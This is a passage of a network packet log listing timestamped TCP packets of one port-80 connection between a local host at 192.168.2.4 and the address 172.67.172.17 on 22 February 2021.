Feb 22, 2021 09:14:34.610945940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.610974073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.611073017 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.611613035 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.611638069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.611715078 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.612334967 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.612360954 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.612428904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.612967968 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.612998962 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.613055944 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.613672972 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.613708973 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.613787889 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.614329100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.614365101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.614428997 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.615051031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.615077972 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.615139008 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.615679026 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.615709066 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.615778923 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.616390944 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.616425991 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.616496086 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.617022038 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.617052078 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.617125034 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.617712975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.617737055 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.617819071 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.629167080 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.629201889 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.629281044 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.629419088 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.629446983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.629498005 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.630362988 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.630386114 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.630495071 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.630687952 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.630712032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.630779028 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.631516933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.631542921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.631675005 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.633776903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.633809090 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.633866072 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.635023117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.635051966 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.635129929 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.635276079 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.635299921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.635348082 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.635998964 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.636023045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.636087894 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.636990070 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.637013912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.637089968 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.638125896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.638148069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.638209105 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.639125109 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.639163017 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.639210939 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.640609026 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.640635014 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.640734911 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.640902996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.640928984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.640991926 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.641992092 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.642013073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.642039061 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.642091990 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.642671108 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.642703056 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.642731905 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.642744064 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.642828941 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.643477917 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.643511057 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.643541098 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.643579006 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.644416094 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.644438028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.644462109 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.644486904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.644519091 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.645344973 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.645374060 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.645416975 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.645437002 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.646274090 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.646300077 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.646322012 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.646655083 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.647186995 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.647212982 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.647237062 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.647264957 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.648068905 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.648097992 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.648119926 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.648134947 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.648169994 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.648930073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.648955107 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.649024963 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.649547100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.649576902 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.649604082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.649638891 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.650382996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.650403976 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.650429010 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.650443077 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.650492907 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.651200056 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.651221037 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.651252985 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.651273966 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.652002096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.652024031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.652041912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.652102947 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.652796030 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.652821064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.652849913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.652889967 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.653562069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.653584957 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.653609037 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.653629065 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.653665066 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.654298067 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.654324055 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.654346943 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.654393911 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.655064106 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.655088902 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.655111074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.655159950 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.655210018 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.655787945 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.655818939 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.655847073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.655909061 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.656579018 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.656604052 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.656634092 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.656699896 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.656857967 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.657285929 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.657315016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.657332897 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.657366991 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.658023119 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.658047915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.658076048 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.658077002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.658123016 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.658763885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.658793926 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.658818007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.658844948 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.658844948 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.658889055 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.659740925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.659765959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.659787893 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.659807920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.659832001 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.659857988 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.660677910 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.660703897 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.660723925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.660743952 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.660773039 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.660803080 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.661607027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.661634922 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.661655903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.661675930 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.661710978 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.661748886 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.662513018 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.662540913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.662575006 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.662585974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.662631989 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.663450956 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.663480997 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.663506031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.663531065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.663563967 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.663604021 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.664309025 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.664335966 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.664357901 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.664377928 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.664422035 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.664448977 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.665177107 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.665205002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.665229082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.665252924 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.665277958 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.665319920 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.666028976 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.666055918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.666076899 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.666098118 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.666111946 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.666146040 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.666868925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.666889906 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.666939974 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.666965961 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.667004108 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.667036057 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.667720079 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.667742968 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.667769909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.667789936 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.667813063 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.667879105 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.668538094 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.668570042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.668596983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.668622971 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.668626070 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.668689013 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.669413090 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.669436932 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.669464111 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.669487953 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.669496059 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.669523954 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.670209885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.670234919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.670260906 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.670289993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.670290947 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.670337915 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.671053886 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.671081066 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.671102047 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.671130896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.671143055 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.671192884 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.671885014 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.671916962 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.671943903 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.671973944 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.671992064 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.672025919 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.672724009 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.672749043 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.672770977 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.672791004 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.672816992 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.672908068 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.673561096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.673588037 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.673609972 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.673630953 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.673664093 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.673715115 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.674407959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.674453020 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.674473047 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.674505949 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.674556971 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.674570084 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.675246954 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.675280094 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.675304890 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.675323009 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.675334930 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.675379992 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.676084995 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.676115990 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.676137924 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.676161051 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.676176071 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.676218033 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.676898003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.676923990 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.676949978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.676975965 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.676990032 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.677042961 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.677728891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.677751064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.677773952 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.677794933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.677809000 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.677840948 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.678589106 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.678615093 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.678638935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.678663969 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.678708076 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.678745031 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.679248095 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.679270983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.679295063 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.679320097 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.679341078 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.679347992 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.679388046 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.680092096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.680114985 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.680139065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.680160046 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.680183887 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.680185080 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.680219889 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.680244923 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.681015015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681051970 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681078911 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681106091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681133032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681153059 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.681183100 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.681797028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681832075 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681865931 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681902885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681932926 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.681931019 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.681979895 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:34.682610035 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:34.682638884 CET	80	49761	172.67.172.17	192.168.2.4
